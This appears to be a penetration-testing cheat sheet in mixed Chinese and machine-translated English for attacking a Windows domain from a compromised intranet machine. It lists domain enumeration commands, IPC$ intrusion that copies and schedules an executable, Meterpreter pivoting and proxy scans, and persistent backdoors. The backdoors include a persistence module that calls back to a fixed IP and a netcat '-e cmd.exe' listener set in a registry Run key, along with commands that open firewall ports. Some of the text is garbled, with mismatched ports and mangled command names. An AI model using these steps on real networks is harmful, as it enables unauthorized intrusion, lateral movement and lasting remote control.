collect message
With the authority of the first machine on the intranet, it is a very critical step of information collection, which is also an indispensable part of intranet penetration.
View the network environment of the current machine, collect relevant information in the domain, including all users, all computers, and related key group information.
net user/domain:查看域用户
net view/domain:查看有几个域
net view/domain:xxx:查看域内的主机
net group/domain:查看域里面的组
net group "domain computers" /domain:查看域内所有的主机名
net group "domain admins" /domain:查看域管理员
net group "domain controllers" /domain:查看域控制器
net group "enterprise admins" /domain:查看企业管理组
nettime/domain:查看时间服务器
A lot of information can be obtained through the above, there are two situations at this time:
当前服务器可以直接攻击域服务器和不可以直接攻击域服务器
Can not directly attack is divided into two situations:
如果是权限不够就需要提升权限,如果是不能连接到域服务器,则需要攻击内网中某个可以连接到域服务器的服务器,然后以此做为跳板
Right now, the domain server cannot be directly attacked by permission issues, and the following methods can be adopted to continue infiltration:
- Use meterpreter's current permissions to add intranet routing and scan for weak passwords
- Use powershell to scan the intranet (requires the target machine to be a server above windows7)
- Set up socks4a and then socks will automatically scan the intranet
- Use current authority to perform intranet IPC$ penetration
- Other methods
ICP$ invasion
That is, the intrusion of obtaining computer control rights by using the IPC$ share that is activated by default in the windows system is extremely common in the intranet.
D:>net use\127.0.0.1\IPC$ 连接127.0.0.1的IPC$共享
D:>copy srv.exe\127.0.0.1\IPC$ 复制srv.exe到目标机
D:>net time\127.0.0.1 查时间
D:>at \127.0.0.1 10:50 srv.exe 用at命令在10点50分启动srv.exe
pivoting springboard attack
- Use compromised edge machines as a springboard to attack other machines in the network
- Access to intranet machines that cannot be directly accessed due to routing problems
Automatic routing
run autoroute -s 192. 168.102. 0/24
run post/multi/manage/autoroute
扫描内网网络:
run post/Windows/gather/arp_scanner rhosts = 192.168.102.0/24
use auxiliary/scanner/portscan/tcp
proxychains proxy settings
socket proxy
auxiliary/server/socks4a
proxy chains nmap scan
Permanent backdoor
metsvc:
通过服务启动
run metsvc -A #设定端口、上传后门文件
persistence:
通过启动型启动
特性:定期回连、系统启动时回连、自动运行
run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.101
nc backdoor
上传nc:Upload/root/nc.exe C:\\windows\\system32
修改注册表
枚举注册表键值:reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
在当前主键下增加一个nc键值:reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -LDP 444 -e cmd.exe'
查看nc键值:reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
设置防火墙
开启一个cmd的通道
execute -f cmd -i -H
查看防火墙状态
netsh firewall show opmode
添加防火墙规则允许444端口通过
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE
查看端口状态
netsh firewall show portopening
开始连接
nc -v ip port